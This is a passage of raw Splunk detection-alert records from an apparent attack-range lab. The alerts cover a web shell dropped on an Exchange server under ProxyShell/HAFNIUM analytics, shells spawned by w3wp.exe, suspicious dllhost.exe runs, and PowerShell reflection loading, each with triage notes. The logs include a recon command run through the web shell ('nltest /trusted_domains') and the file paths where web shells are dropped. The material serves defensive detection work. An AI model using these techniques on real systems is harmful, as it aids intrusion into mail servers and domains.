Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664883832, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-04T10:30:25", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:42:03", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664883832, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-04T10:30:25", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:42:03", original_file_name="Cmd.Exe", parent_process="c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipmb991e788-0137-49d8-bf80-6e84f2791064 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w \"\" -m 0", process="\"cmd.exe\" /c nltest /trusted_domains", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="SYSTEM" 1664883832, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-04T10:30:25", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T10:42:03", original_file_name="unknown", parent_process="C:\\Windows\\System32\\inetsrv\\w3wp.exe", process="C:\\Windows\\System32\\cmd.exe /c nltest /trusted_domains", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="EXCHANGE01$" 1664877600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664877600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5576", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664877600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664877600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4360", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664877600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664877600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x15c8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664877600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664877600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1108", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664881759, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-04 10:30:14.636", file_name="iuyed.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\iuyed.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - iuyed.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="iuyed.aspx", threat_object_type="file name" 1664880935, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664880935, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664880935, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T09:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T09:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664880935, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if 